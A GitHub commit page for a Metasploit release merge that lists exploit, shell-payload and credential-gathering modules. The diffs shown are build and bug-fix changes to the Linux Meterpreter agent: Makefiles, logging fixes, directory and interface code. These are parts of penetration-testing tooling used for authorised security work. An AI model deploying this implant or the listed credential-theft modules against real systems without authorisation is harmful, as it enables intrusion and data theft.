Skip to content
Browse files

Merge branch 'release/20120213000001' into stable

Conflicts:
	modules/auxiliary/scanner/vmware/vmware_http_login.rb
  • Loading branch information...
2 parents d70596a + 794ebe4 commit ad0251e256a81c11fa4a5d2db3108425a89269f8 Jenkins committed Feb 16, 2012
Showing with 4,058 additions and 764 deletions.
  1. BIN data/meterpreter/ext_server_networkpug.lso
  2. BIN data/meterpreter/ext_server_sniffer.lso
  3. BIN data/meterpreter/ext_server_stdapi.lso
  4. BIN data/meterpreter/msflinker_linux_x86.bin
  5. BIN data/templates/template_x64_darwin.bin
  6. +38 −25 external/source/meterpreter/Makefile
  7. +2 −0 external/source/meterpreter/source/bionic/libdl/Makefile
  8. +3 −0 external/source/meterpreter/source/bionic/libm/msfMakefile
  9. +3 −3 external/source/meterpreter/source/common/arch/posix/scheduler.c
  10. +1 −1 external/source/meterpreter/source/extensions/networkpug/networkpug.c
  11. +2 −2 external/source/meterpreter/source/extensions/sniffer/sniffer.c
  12. +25 −6 external/source/meterpreter/source/extensions/stdapi/server/fs/dir.c
  13. +14 −14 external/source/meterpreter/source/extensions/stdapi/server/fs/fs_util.c
  14. +202 −102 external/source/meterpreter/source/extensions/stdapi/server/net/config/interface.c
  15. +1 −1 external/source/meterpreter/source/server/linux/netlink.c
  16. +33 −38 external/source/meterpreter/source/server/rtld/Makefile
  17. +1 −1 external/source/meterpreter/source/server/rtld/metsrv_rtld.c
  18. +1 −1 external/source/meterpreter/source/server/server_setup.c
  19. +4 −0 external/source/meterpreter/workspace/common/Makefile
  20. +4 −1 external/source/meterpreter/workspace/ext_posix_sample/Makefile
  21. +12 −10 external/source/meterpreter/workspace/ext_server_networkpug/Makefile
  22. +6 −2 external/source/meterpreter/workspace/ext_server_sniffer/Makefile
  23. +17 −9 external/source/meterpreter/workspace/ext_server_stdapi/Makefile
  24. +4 −1 external/source/meterpreter/workspace/metsrv/Makefile
  25. +3 −2 external/source/shellcode/Makefile.incl
  26. +2 −2 external/source/shellcode/bsd/ia32/Makefile
  27. +36 −0 external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm
  28. +42 −0 external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm
  29. +108 −0 external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm
  30. +112 −0 external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm
  31. +30 −20 lib/fastlib.rb
  32. +12 −13 lib/msf/core/db.rb
  33. +4 −4 lib/msf/core/event_dispatcher.rb
  34. +5 −1 lib/msf/core/exploit/capture.rb
  35. +19 −16 lib/msf/core/exploit/http/client.rb
  36. +1 −0 lib/msf/core/exploit/http/server.rb
  37. +4 −4 lib/msf/core/exploit/mssql.rb
  38. +1 −1 lib/msf/core/exploit/postgres.rb
  39. +33 −0 lib/msf/core/post/unix/enum_user_dirs.rb
  40. +4 −0 lib/msf/core/rpc/v10/rpc_auth.rb
  41. +5 −0 lib/msf/core/rpc/v10/service.rb
  42. +27 −2 lib/msf/ui/banner.rb
  43. +27 −1 lib/msf/util/exe.rb
  44. +1 −1 lib/rex/parser/nokogiri_doc_mixin.rb
  45. +11 −0 lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb
  46. +6 −0 lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb
  47. +1 −0 lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
  48. +3 −1 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
  49. +2 −2 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
  50. +48 −29 lib/rex/registry/hive.rb
  51. +4 −6 lib/rex/registry/regf.rb
  52. +7 −2 lib/rex/ui/text/table.rb
  53. +12 −10 modules/auxiliary/admin/natpmp/natpmp_map.rb
  54. +14 −12 modules/auxiliary/gather/natpmp_external_address.rb
  55. +15 −6 modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb
  56. +8 −0 modules/auxiliary/scanner/discovery/ipv6_neighbor.rb
  57. +1 −1 modules/auxiliary/scanner/mssql/mssql_ping.rb
  58. +14 −12 modules/auxiliary/scanner/natpmp/natpmp_portscan.rb
  59. +15 −16 modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
  60. +3 −3 modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
  61. +1 −1 modules/exploits/linux/http/piranha_passwd_exec.rb
  62. +6 −6 modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
  63. +1 −1 modules/exploits/multi/http/tomcat_mgr_deploy.rb
  64. +1 −0 modules/exploits/multi/http/vbseo_proc_deutf.rb
  65. +9 −8 modules/exploits/osx/browser/mozilla_mchannel.rb
  66. +327 −0 modules/exploits/windows/browser/adobe_flash_sps.rb
  67. +122 −0 modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
  68. +1 −1 modules/exploits/windows/browser/enjoysapgui_comp_download.rb
  69. +1 −1 modules/exploits/windows/browser/real_arcade_installerdlg.rb
  70. +1 −1 modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb
  71. +1 −1 modules/exploits/windows/fileformat/mediajukebox.rb
  72. +1 −1 modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb
  73. +1 −1 modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb
  74. +1 −1 modules/exploits/windows/fileformat/vlc_modplug_s3m.rb
  75. +1 −1 modules/exploits/windows/fileformat/vlc_webm.rb
  76. +1 −1 modules/exploits/windows/ftp/easyftp_list_fixret.rb
  77. +1 −1 modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb
  78. +1 −1 modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
  79. +1 −1 modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb
  80. +1 −1 modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb
  81. +1 −1 modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb
  82. +1 −1 modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb
  83. +1 −1 modules/exploits/windows/http/ibm_tsm_cad_header.rb
  84. +2 −1 modules/exploits/windows/http/xampp_webdav_upload_php.rb
  85. +1 −1 modules/exploits/windows/lotus/domino_http_accept_language.rb
  86. +1 −1 modules/exploits/windows/misc/avidphoneticindexer.rb
  87. +117 −0 modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb
  88. +2 −1 modules/exploits/windows/misc/stream_down_bof.rb
  89. +2 −2 modules/exploits/windows/pop3/seattlelab_pass.rb
  90. +1 −1 modules/exploits/windows/scada/citect_scada_odbc.rb
  91. +90 −0 modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb
  92. +1 −1 modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb
  93. +1 −1 modules/exploits/windows/ssh/freeftpd_key_exchange.rb
  94. +52 −0 modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb
  95. +56 −0 modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb
  96. +58 −0 modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb
  97. +67 −0 modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb
  98. +155 −0 modules/post/linux/gather/mount_cifs_creds.rb
  99. +168 −0 modules/post/multi/gather/fetchmailrc_creds.rb
  100. +6 −1 modules/post/multi/gather/filezilla_client_cred.rb
  101. +108 −0 modules/post/multi/gather/netrc_creds.rb
  102. +4 −10 modules/post/windows/escalate/net_runtime_modify.rb
  103. +1 −6 modules/post/windows/escalate/service_permissions.rb
  104. +6 −1 modules/post/windows/gather/credentials/coreftp.rb
  105. +6 −1 modules/post/windows/gather/credentials/enum_cred_store.rb
  106. +0 −12 modules/post/windows/gather/credentials/enum_picasa_pwds.rb
  107. +6 −1 modules/post/windows/gather/credentials/epo_sql.rb
  108. +22 −6 modules/post/windows/gather/credentials/filezilla_server.rb
  109. +6 −1 modules/post/windows/gather/credentials/flashfxp.rb
  110. +6 −2 modules/post/windows/gather/credentials/ftpnavigator.rb
  111. +6 −1 modules/post/windows/gather/credentials/mremote.rb
  112. +12 −14 modules/post/windows/gather/credentials/outlook.rb
  113. +6 −1 modules/post/windows/gather/credentials/smartftp.rb
  114. +6 −1 modules/post/windows/gather/credentials/total_commander.rb
  115. +12 −2 modules/post/windows/gather/credentials/vnc.rb
  116. +12 −2 modules/post/windows/gather/credentials/winscp.rb
  117. +6 −1 modules/post/windows/gather/credentials/wsftp_client.rb
  118. +0 −26 modules/post/windows/gather/enum_domains.rb
  119. +0 −6 modules/post/windows/gather/reverse_lookup.rb
  120. +1 −1 modules/post/windows/gather/usb_history.rb
  121. +7 −6 modules/post/windows/manage/download_exec.rb
  122. +0 −41 modules/post/windows/recon/computer_browser_discovery.rb
  123. +0 −1 modules/post/windows/recon/resolve_hostname.rb
  124. +1 −1 msfbinscan
  125. +1 −2 msfcli
  126. +1 −1 msfconsole
  127. +1 −1 msfd
  128. +1 −1 msfelfscan
  129. +1 −1 msfencode
  130. +1 −1 msfmachscan
  131. +1 −1 msfpayload
  132. +1 −1 msfpescan
  133. +1 −1 msfrop
  134. +1 −1 msfrpc
  135. +1 −1 msfrpcd
  136. +1 −1 msfvenom
  137. +70 −80 plugins/nessus.rb
  138. +301 −0 scripts/resource/auto_cred_checker.rc
  139. +748 −0 scripts/resource/basic_discovery.rc
  140. +119 −0 scripts/resource/multi_post.rc
  141. +28 −13 scripts/resource/portscan.rc
  142. +9 −2 tools/exe2vba.rb
  143. +9 −2 tools/exe2vbs.rb
  144. +8 −1 tools/find_badchars.rb
  145. +8 −2 tools/halflm_second.rb
  146. +12 −0 tools/list_interfaces.rb
  147. +9 −2 tools/lm2ntcrack.rb
  148. +9 −1 tools/metasm_shell.rb
  149. +9 −2 tools/module_author.rb
  150. +9 −2 tools/module_changelog.rb
  151. +9 −2 tools/module_disclodate.rb
  152. +9 −2 tools/module_license.rb
  153. +9 −2 tools/module_mixins.rb
  154. +9 −2 tools/module_ports.rb
  155. +9 −2 tools/module_rank.rb
  156. +9 −2 tools/module_reference.rb
  157. +9 −2 tools/module_targets.rb
  158. +10 −3 tools/msf_irb_shell.rb
  159. +25 −5 tools/msftidy.rb
  160. +9 −1 tools/nasm_shell.rb
  161. +9 −1 tools/pattern_create.rb
  162. +9 −1 tools/pattern_offset.rb
  163. +9 −2 tools/payload_lengths.rb
  164. +54 −47 tools/reg.rb
View
BIN data/meterpreter/ext_server_networkpug.lso
Binary file not shown.
View
BIN data/meterpreter/ext_server_sniffer.lso
Binary file not shown.
View
BIN data/meterpreter/ext_server_stdapi.lso
Binary file not shown.
View
BIN data/meterpreter/msflinker_linux_x86.bin 100755 → 100644
Binary file not shown.
View
BIN data/templates/template_x64_darwin.bin
Binary file not shown.
View
63 external/source/meterpreter/Makefile
@@ -15,10 +15,24 @@ objects += data/meterpreter/ext_server_stdapi.lso
objects += data/meterpreter/ext_server_sniffer.lso
objects += data/meterpreter/ext_server_networkpug.lso
+BIONIC=$(PWD)/external/source/meterpreter/source/bionic
+LIBC=$(BIONIC)/libc
+LIBM=$(BIONIC)/libm
+COMPILED=$(BIONIC)/compiled
+
+PCAP_CFLAGS = -march=i386 -m32 -Wl,--hash-style=sysv -fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall -D_UNIX -D__linux__ -I$(LIBC)/include -I$(LIBC)/kernel/common/linux/ -I$(LIBC)/kernel/common/ -I$(LIBC)/arch-x86/include/ -I$(LIBC)/kernel/arch-x86/ -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -D_BYTE_ORDER=_LITTLE_ENDIAN -lgcc -L$(COMPILED) -fPIC -Os -lc
+
+OSSL_CFLAGS=-Os -Wl,--hash-style=sysv -march=i386 -m32 -nostdinc -nostdlib -fno-builtin -fpic -I $(LIBC)/include -I $(LIBC)/kernel/common/linux/ -I $(LIBC)/kernel/common/ -I $(LIBC)/arch-x86/include/ -I $(LIBC)/kernel/arch-x86/ -I$(LIBC)/private -I$(LIBM)/include -DPIC -Dwchar_t='char' -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -D_BYTE_ORDER=_LITTLE_ENDIAN -L$(COMPILED) -lc
+
workspace = external/source/meterpreter/workspace
all: $(objects)
+debug: DEBUG=true
+# I'm 99% sure this is the wrong way to do this
+debug: MAKE += debug
+debug: all
+
external/source/meterpreter/source/bionic/compiled/libc.so: external/source/meterpreter/source/bionic/compiled
(cd external/source/meterpreter/source/bionic/libc && ARCH=x86 TOP=${PWD} jam && cd out/x86/ && sh make.sh && [ -f libbionic.so ] )
cp external/source/meterpreter/source/bionic/libc/out/x86/libbionic.so external/source/meterpreter/source/bionic/compiled/libc.so
@@ -27,38 +41,33 @@ external/source/meterpreter/source/bionic/compiled:
mkdir external/source/meterpreter/source/bionic/compiled/
external/source/meterpreter/source/bionic/compiled/libm.so:
- (cd external/source/meterpreter/source/bionic/libm && make -f msfMakefile && [ -f libm.so ])
- cp external/source/meterpreter/source/bionic/libm/libm.so external/source/meterpreter/source/bionic/compiled/libm.so
+ $(MAKE) -C $(LIBM) -f msfMakefile && [ -f $(LIBM)/libm.so ]
+ cp $(LIBM)/libm.so $(COMPILED)/libm.so
external/source/meterpreter/source/bionic/compiled/libdl.so:
- (cd external/source/meterpreter/source/bionic/libdl && make && [ -f libdl.so ])
- cp external/source/meterpreter/source/bionic/libdl/libdl.so external/source/meterpreter/source/bionic/compiled/libdl.so
+ $(MAKE) -C $(BIONIC)/libdl && [ -f $(BIONIC)/libdl/libdl.so ]
+ cp $(BIONIC)/libdl/libdl.so $(COMPILED)/libdl.so
external/source/meterpreter/source/bionic/compiled/libcrypto.so: tmp/openssl-0.9.8o/libssl.so
- cp tmp/openssl-0.9.8o/libcrypto.so external/source/meterpreter/source/bionic/compiled/libcrypto.so
+ cp tmp/openssl-0.9.8o/libcrypto.so external/source/meterpreter/source/bionic/compiled/libcrypto.so
external/source/meterpreter/source/bionic/compiled/libssl.so: tmp/openssl-0.9.8o/libssl.so
cp tmp/openssl-0.9.8o/libssl.so external/source/meterpreter/source/bionic/compiled/libssl.so
-LIBC=$(PWD)/external/source/meterpreter/source/bionic/libc
-LIBM=$(PWD)/external/source/meterpreter/source/bionic/libm
-COMPILED=$(PWD)/external/source/meterpreter/source/bionic/compiled
-MSF_CFLAGS=-Os -Wl,--hash-style=sysv -march=i386 -m32 -nostdinc -nostdlib -fno-builtin -fpic -I $(LIBC)/include -I $(LIBC)/kernel/common/linux/ -I $(LIBC)/kernel/common/ -I $(LIBC)/arch-x86/include/ -I $(LIBC)/kernel/arch-x86/ -I$(LIBC)/private -I$(LIBM)/include -DPIC -Dwchar_t='char' -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -D_BYTE_ORDER=_LITTLE_ENDIAN -L$(COMPILED) -lc
-
tmp/openssl-0.9.8o/libssl.so:
- [ -d tmp ] || mkdir tmp
+ [ -d tmp ] || mkdir tmp
[ -d tmp/openssl-0.9.8o ] || wget -O tmp/openssl-0.9.8o.tar.gz http://openssl.org/source/openssl-0.9.8o.tar.gz
[ -f tmp/openssl-0.9.8o/Configure ] || tar -C tmp/ -xzf tmp/openssl-0.9.8o.tar.gz
(cd tmp/openssl-0.9.8o && \
cat Configure | grep -v 'linux-msf' | \
sed -e 's#my %table=(#my %table=( \
- "linux-msf", "gcc:$(MSF_CFLAGS) -DL_ENDIAN -DTERMIO -Wall::$(MSF_CFLAGS) -D_REENTRANT::$(MSF_CFLAGS) -ldl:BN_LLONG $${x86_gcc_des} $${x86_gcc_opts}:$${x86_elf_asm}:dlfcn:linux-shared:$(MSF_CFLAGS) -fPIC::.so.\\$$\\$$(SHLIB_MAJOR).\\$$\\$$(SHLIB_MINOR)",\
+ "linux-msf", "gcc:$(OSSL_CFLAGS) -DL_ENDIAN -DTERMIO -Wall::$(OSSL_CFLAGS) -D_REENTRANT::$(OSSL_CFLAGS) -ldl:BN_LLONG $${x86_gcc_des} $${x86_gcc_opts}:$${x86_elf_asm}:dlfcn:linux-shared:$(OSSL_CFLAGS) -fPIC::.so.\\$$\\$$(SHLIB_MAJOR).\\$$\\$$(SHLIB_MINOR)",\
#;' > Configure-msf;\
cp Configure-msf Configure && chmod +x Configure && \
grep linux-msf Configure && \
./Configure --prefix=/tmp/out threads shared no-hw no-dlfcn no-zlib no-krb5 no-idea 386 linux-msf \
)
- (cd tmp/openssl-0.9.8o && make CC="gcc -march=i386 -m32 -Os -Wl,--hash-style=sysv -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -I${PWD}/external/source/meterpreter/source/bionic/libc/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I${PWD}/external/source/meterpreter/source/bionic/libm/include -L${PWD}/external/source/meterpreter/source/bionic/compiled -D_BYTE_ORDER=_LITTLE_ENDIAN -lc" depend all ; [ -f libssl.so.0.9.8 -a -f libcrypto.so.0.9.8 ] )
+ (cd tmp/openssl-0.9.8o && make depend all ; [ -f libssl.so.0.9.8 -a -f libcrypto.so.0.9.8 ] )
cp tmp/openssl-0.9.8o/libssl.so* tmp/openssl-0.9.8o/libcrypto.so* external/source/meterpreter/source/openssl/lib/linux/i386/
external/source/meterpreter/source/bionic/compiled/libpcap.so: tmp/libpcap-1.1.1/libpcap.so.1.1.1
@@ -77,42 +86,42 @@ tmp/libpcap-1.1.1/libpcap.so.1.1.1:
echo '#define _STDLIB_H this_works_around_malloc_definition_in_grammar_dot_c' >> tmp/libpcap-1.1.1/config.h
(cd tmp/libpcap-1.1.1 && patch --dry-run -p0 < ../../external/source/meterpreter/source/libpcap/pcap_nametoaddr_fix.diff && patch -p0 < ../../external/source/meterpreter/source/libpcap/pcap_nametoaddr_fix.diff)
sed -i -e s/pcap-usb-linux.c//g -e s/fad-getad.c/fad-gifc.c/g tmp/libpcap-1.1.1/Makefile
- sed -i -e s^"CC = gcc"^"CC = gcc -march=i386 -m32 -Wl,--hash-style=sysv -fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall -D_UNIX -D__linux__ -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -D_BYTE_ORDER=_LITTLE_ENDIAN -lgcc -L${PWD}/external/source/meterpreter/source/bionic/compiled -gstabs+ -fPIC -Os -lc"^g tmp/libpcap-1.1.1/Makefile
- (cd tmp/libpcap-1.1.1 && make)
+ sed -i -e s^"CC = gcc"^"CC = gcc $(PCAP_CFLAGS)"^g tmp/libpcap-1.1.1/Makefile
+ $(MAKE) -C tmp/libpcap-1.1.1
data/meterpreter/msflinker_linux_x86.bin: external/source/meterpreter/source/server/rtld/msflinker.bin
cp external/source/meterpreter/source/server/rtld/msflinker.bin data/meterpreter/msflinker_linux_x86.bin
external/source/meterpreter/source/server/rtld/msflinker.bin: external/source/meterpreter/source/bionic/compiled/libc.so
- (cd external/source/meterpreter/source/server/rtld ; make)
+ $(MAKE) -C external/source/meterpreter/source/server/rtld
$(workspace)/metsrv/libmetsrv_main.so:
- (cd $(workspace)/metsrv && make)
+ $(MAKE) -C $(workspace)/metsrv
external/source/meterpreter/source/bionic/compiled/libmetsrv_main.so: $(workspace)/metsrv/libmetsrv_main.so
- cp $(workspace)/metsrv/libmetsrv_main.so external/source/meterpreter/source/bionic/compiled/libmetsrv_main.so
+ cp $(workspace)/metsrv/libmetsrv_main.so external/source/meterpreter/source/bionic/compiled/libmetsrv_main.so
$(workspace)/common/libsupport.so:
- (cd $(workspace)/common && make)
+ $(MAKE) -C $(workspace)/common
external/source/meterpreter/source/bionic/compiled/libsupport.so: $(workspace)/common/libsupport.so
cp $(workspace)/common/libsupport.so external/source/meterpreter/source/bionic/compiled/libsupport.so
$(workspace)/ext_server_sniffer/ext_server_sniffer.so:
- (cd $(workspace)/ext_server_sniffer && make)
+ $(MAKE) -C $(workspace)/ext_server_sniffer
data/meterpreter/ext_server_sniffer.lso: $(workspace)/ext_server_sniffer/ext_server_sniffer.so
cp $(workspace)/ext_server_sniffer/ext_server_sniffer.so data/meterpreter/ext_server_sniffer.lso
$(workspace)/ext_server_stdapi/ext_server_stdapi.so:
- (cd $(workspace)/ext_server_stdapi && make)
+ $(MAKE) -C $(workspace)/ext_server_stdapi
-data/meterpreter/ext_server_stdapi.lso: $(workspace)/ext_server_stdapi/ext_server_stdapi.so
+data/meterpreter/ext_server_stdapi.lso: $(workspace)/ext_server_stdapi/ext_server_stdapi.so
cp $(workspace)/ext_server_stdapi/ext_server_stdapi.so data/meterpreter/ext_server_stdapi.lso
$(workspace)/ext_server_networkpug/ext_server_networkpug.so:
- (cd $(workspace)/ext_server_networkpug && make)
+ $(MAKE) -C $(workspace)/ext_server_networkpug
data/meterpreter/ext_server_networkpug.lso: $(workspace)/ext_server_networkpug/ext_server_networkpug.so
cp $(workspace)/ext_server_networkpug/ext_server_networkpug.so data/meterpreter/ext_server_networkpug.lso
@@ -128,13 +137,17 @@ clean:
(cd $(workspace) && make clean)
clean-pcap:
- (cd tmp/libpcap-1.1.1/ && make clean)
+ #(cd tmp/libpcap-1.1.1/ && make clean)
+ # This avoids the pcap target trying to patch the same file more than once.
+ # It's a pretty small tar, so untar'ing goes pretty quickly anyway, in
+ # contrast to openssl.
+ rm -r tmp/libpcap-1.1.1 || true
clean-ssl:
(cd tmp/openssl-0.9.8o/ && make clean)
really-clean: clean clean-ssl clean-pcap
-.PHONY: clean clean-ssl clean-pcap really-clean
+.PHONY: clean clean-ssl clean-pcap really-clean debug
View
2 external/source/meterpreter/source/bionic/libdl/Makefile
@@ -8,5 +8,7 @@ CFLAGS+= -march=i386 -m32
all:
gcc -Wl,--hash-style=sysv -shared -o libdl.so $(CFLAGS) libdl.c
+debug: all
+
clean:
rm libdl.so
View
3 external/source/meterpreter/source/bionic/libm/msfMakefile
@@ -224,6 +224,9 @@ SOBJ=$(OBJ:.S=.o)
all: $(OBJ) ${SOBJ}
gcc ${CFLAGS} -shared -nostdinc -nostdlib -o libm.so *.o
+debug: CFLAGS+=-ggdb
+debug: all
+
.S.o:
gcc ${CFLAGS} -nostdinc -nostdlib -c $<
.c.o:
View
6 external/source/meterpreter/source/common/arch/posix/scheduler.c
@@ -58,8 +58,8 @@ DWORD scheduler_destroy( VOID )
polltable = NULL;
nentries = ntableentries = 0;
}
-
- dprintf("[%s] Now for the fun part, iterating through list and removing items");
+
+ dprintf("[%s] Now for the fun part, iterating through list and removing items", __FUNCTION__);
LIST_FOREACH_SAFE(current, &WEHead, link, tmp)
{
@@ -84,7 +84,7 @@ DWORD scheduler_destroy( VOID )
DWORD scheduler_initialize( Remote * remote )
{
if(scheduler_thread) {
- dprintf("[%s] Hmmm. scheduler_initialize() called twice?");
+ dprintf("[%s] Hmmm. scheduler_initialize() called twice?", __FUNCTION__);
return ERROR_SUCCESS;
}
View
2 external/source/meterpreter/source/extensions/networkpug/networkpug.c
@@ -178,7 +178,7 @@ void free_networkpug(NetworkPug *np, int close_channel, int destroy_channel)
cont = __atomic_swap(0, &np->active);
if(! cont) {
- dprintf("Seems the pug at %p was already set free");
+ dprintf("Seems the pug at %p was already set free", &np);
return;
}
View
4 external/source/meterpreter/source/extensions/sniffer/sniffer.c
@@ -74,7 +74,7 @@ char *get_interface_name_by_index(unsigned int fidx)
interfaces = int_iter = NULL;
if(pcap_findalldevs(&interfaces, errbuf) == -1) {
- dprintf("[%s] Hmm, out of memory? (errno = %d, but probably not useful)", errno);
+ dprintf("[%s] Hmm, out of memory? (errno = %d, but probably not useful)", __FUNCTION__, errno);
return NULL;
}
@@ -399,7 +399,7 @@ void packet_handler(u_char *user, const struct pcap_pkthdr *h, const u_char *byt
pkt = calloc(sizeof(PeterPacket) + h->caplen, 1);
if(! pkt) {
- dprintf("[%s] ho hum, no memory. maybe a pcap_breakloop / stop running?");
+ dprintf("[%s] ho hum, no memory. maybe a pcap_breakloop / stop running?", __FUNCTION__);
return;
}
View
31 external/source/meterpreter/source/extensions/stdapi/server/fs/dir.c
@@ -101,9 +101,13 @@ DWORD request_fs_ls(Remote *remote, Packet *packet)
goto out;
}
data = readdir(ctx);
+ if (!(baseDirectory = _strdup(directory)))
+ {
+ result = ERROR_NOT_ENOUGH_MEMORY;
+ goto out;
+ }
#define DF_NAME data->d_name
-
#endif
do
@@ -138,7 +142,11 @@ DWORD request_fs_ls(Remote *remote, Packet *packet)
// Build the full path
if (baseDirectory)
+#ifdef _WIN32
sprintf(tempFile, "%s\\%s", baseDirectory, DF_NAME);
+#else
+ sprintf(tempFile, "%s/%s", baseDirectory, DF_NAME);
+#endif
else
sprintf(tempFile, "%s", DF_NAME);
@@ -211,21 +219,32 @@ DWORD request_fs_getwd(Remote *remote, Packet *packet)
#ifdef _WIN32
if (!(realSize = GetCurrentDirectory(directorySize, directory)))
-#else
- if (!(realSize = getcwd(directory, directorySize)))
-#endif
{
result = ERROR_NOT_ENOUGH_MEMORY;
break;
}
else if (realSize > directorySize)
{
free(directory);
-
directorySize = realSize;
-
goto again;
}
+#else
+ if (!getcwd(directory, directorySize))
+ {
+ if (errno == ERANGE && directorySize > 0)
+ {
+ // Then we didn't allocate enough to hold the whole path,
+ // increase the size and try again.
+ free(directory);
+ directorySize = directorySize * 2;
+ goto again;
+ } else {
+ dprintf("getcwd failed with errno %d", errno);
+ break;
+ }
+ }
+#endif
packet_add_tlv_string(response, TLV_TYPE_DIRECTORY_PATH,
directory);
View
28 external/source/meterpreter/source/extensions/stdapi/server/fs/fs_util.c
@@ -50,19 +50,19 @@ int fs_stat(LPCSTR filename, struct meterp_stat *buf) {
ret = stat(filename, &sbuf);
if (ret == 0) {
- buf->st_dev = sbuf.st_dev;
- buf->st_ino = sbuf.st_ino;
- buf->st_mode = sbuf.st_mode;
- buf->st_nlink = sbuf.st_nlink;
- buf->st_uid = sbuf.st_uid;
- buf->st_gid = sbuf.st_gid;
- buf->st_rdev = sbuf.st_rdev;
- buf->st_size = sbuf.st_size;
- buf->st_atime = (unsigned long long)sbuf.st_atime;
- buf->st_mtime = (unsigned long long)sbuf.st_mtime;
- buf->st_ctime = (unsigned long long)sbuf.st_ctime;
+ buf->st_dev = sbuf.st_dev;
+ buf->st_ino = sbuf.st_ino;
+ buf->st_mode = sbuf.st_mode;
+ buf->st_nlink = sbuf.st_nlink;
+ buf->st_uid = sbuf.st_uid;
+ buf->st_gid = sbuf.st_gid;
+ buf->st_rdev = sbuf.st_rdev;
+ buf->st_size = sbuf.st_size;
+ buf->st_atime = (unsigned long long)sbuf.st_atime;
+ buf->st_mtime = (unsigned long long)sbuf.st_mtime;
+ buf->st_ctime = (unsigned long long)sbuf.st_ctime;
return 0;
- } else {
- return ret;
- }
+ } else {
+ return ret;
+ }
}
View
304 external/source/meterpreter/source/extensions/stdapi/server/net/config/interface.c
@@ -1,39 +1,184 @@
#include "precomp.h"
+
#ifndef _WIN32
+
+struct iface {
+ unsigned char *name;
+ unsigned int addr_size;
+ unsigned char *addr;
+ unsigned char *netmask;
+ unsigned char *hwaddr;
+ int sa_family;
+};
+
/*
- * Determine the interfaces MAC address by interface name. It seems that libpcap does not
- * support this natively?
+ * Frees an ifaces array returned by get_ifaces
*/
+void free_ifaces(struct iface *ifaces, int count) {
+ int i;
-DWORD get_interface_mac_addr(char *interface, unsigned char *mac)
-{
- struct ifreq ifr;
- int fd = -1;
- DWORD result = ERROR_NOT_SUPPORTED;
-
- memset(mac, 0, 6);
- memset(&ifr, 0, sizeof(struct ifreq));
- strncpy(ifr.ifr_name, interface, sizeof(ifr.ifr_name)-1);
-
- do {
- fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP);
- if(fd == -1) break;
-
- if(ioctl(fd, SIOCGIFHWADDR, &ifr) == -1) {
- if(errno) result = errno;
+ if (!ifaces) {
+ return;
+ }
+
+ dprintf("Freeing %d interfaces", count);
+
+ for (i = 0; i < count; i++) {
+ if (ifaces[i].name) {
+ free(ifaces[i].name);
+ }
+ if (ifaces[i].addr) {
+ free(ifaces[i].addr);
+ }
+ if (ifaces[i].netmask) {
+ free(ifaces[i].netmask);
+ }
+ if (ifaces[i].hwaddr) {
+ free(ifaces[i].hwaddr);
+ }
+ }
+ free(ifaces);
+ return;
+}
+
+/*
+ * Populates +ifaces+ with an array of iface structs
+ *
+ * This is very Linux-specific, but hopefully the idea is generic enough that
+ * adding support for BSD and other Unixes will at least be possible in the
+ * future.
+ *
+ * Returns 0 on success or an errno if something went wrong.
+ *
+ */
+int get_ifaces(struct iface **ifaces, int *count) {
+ int result;
+ struct ifconf ifc = {0};
+ struct ifreq *ifr = NULL;
+ char buf[1024] = {0};
+ int sck = 0;
+ int i = 0;
+
+ unsigned int num_ifaces = 0;
+
+ /* Get a socket handle to use with all the IOCTL magic below. */
+ sck = socket(PF_INET, SOCK_DGRAM, 0);
+ if(sck < 0) {
+ dprintf("socket: %d: %s", errno, strerror(errno));
+ result = errno;
+ goto fail;
+ }
+
+ /* Query available interfaces. */
